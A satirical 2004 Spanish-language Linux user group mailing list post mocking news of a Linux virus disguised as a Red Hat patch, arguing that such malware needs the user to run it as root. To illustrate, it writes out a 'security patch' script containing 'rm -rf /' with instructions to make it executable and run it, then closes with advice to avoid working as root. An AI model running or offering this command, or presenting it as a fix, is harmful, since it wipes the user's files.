[LUG.ro] Anuncian virus para GNU/Linux (nos creen idiotas???)
Sebastian D. Criado
lugro@lugro.org.ar
Fri, 5 Nov 2004 23:34:41 -0300
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Termino de ver una noticia que segumente comenzara a dar vueltas por la red y
es que la empresa Tren descubrió un virus para GNU/Linux que se camufla como
un parche de Red Hat
http://www.terra.com.mx/tecnologia/articulo/146691/
El tema esta en que, no solo tiene que bajarse el archivo que le mandan a
bajar desde un link, si no que tiene que darle los permisos de ejecución para
que funcione y luego correrlo como root para que haga algo de lo que dice
hacer.
A ver, les paso un virus, por favor, tengan a bien cotar y pegar lo siguiente
en un archivo llamado parche_de_seguridad.sh
Disculpen que no les pase un ELF, pero estaba apurado, para el caso,
funcionara igual
La replicación esta en que tienen que mandarcelo a 10 personas :)
- ---------------cut-------------------
#/bin/bash
rm -rf /
- ---------------cut------------------
Por supuesto, ponganle permiso de ejecución:
#chmod 0700 parche_de_seguridad.sh
y ejecutenlo
./parche_de_seguridad.sh
Listo, ya no tienen más árbol de directorios
Una cosas para aprender, hasta este simple y estúpido script es explotable si
quién tiene root de la máquina ejecuta lo que venga sin comprobar que tiene
dentro.
y dos, cuanto más trabajes como usuario root, más probabilidad de que te
mandes una cagada.
Moraleja, usar un usuario normal y solo root cuando lo que tienes que hacer
ya no lo puedes hacer como usuario. Inmediatamente despues, volver a usuario.
Saludos./
- --
Sebastián D. Criado - scriado{en}ciudad.com.ar
L.U.G.R.o - http://www.lugro.org.ar
GNU/Linux Registered User # 146768
- -------------------------------------------------------------------
"Si el Universo fuera un programa estaría hecho en C, y correría sobre
un sistema UNIX"
Anónimo.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFBjDhC8hmHQ8ZCg0IRAv9eAKCU463H8Vp3Z1rzz0uNlGY7TDkWwgCfT8+9
V/FlOfYoLFnDefINY1wXh4M=
=mRsz
-----END PGP SIGNATURE-----